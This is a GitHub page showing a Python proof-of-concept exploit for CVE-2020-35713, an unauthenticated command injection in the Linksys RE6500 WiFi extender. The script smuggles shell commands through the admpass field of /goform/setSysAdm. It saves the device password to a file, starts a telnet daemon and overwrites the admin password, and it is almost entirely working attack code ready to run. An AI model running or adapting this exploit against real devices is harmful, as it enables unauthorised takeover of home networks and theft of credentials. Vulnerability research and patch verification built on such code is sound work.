-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2020-35713.py
49 lines (43 loc) · 2.12 KB
/
CVE-2020-35713.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python
#Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
#Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution.
#An attacker can access system OS configurations and commands that are not intended for use beyond the web UI.
# Exploit Author: RE-Solver - https://twitter.com/solver_re
# Vendor Homepage: www.linksys.com
# Version: FW V1.05 up to FW v1.0.11.001
from requests import Session
import requests
import os
print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
print("Tested on FW V1.05 up to FW v1.0.11.001")
print("RE-Solver @solver_re")
ip="192.168.1.226"
command="nvram_get Password >/tmp/lastpwd"
#save device password;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r= s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Prev password saved in /tmp/lastpwd")
command="busybox telnetd"
#start telnetd;
post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Telnet Enabled")
#set admin password
post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
url_codeinjection="http://"+ip+"/goform/setSysAdm"
s = requests.Session()
s.headers.update({'Origin': "http://"+ip})
s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
r=s.post(url_codeinjection, data=post_data)
if r.status_code == 200:
print("[+] Prevent corrupting nvram - set a new password= admin")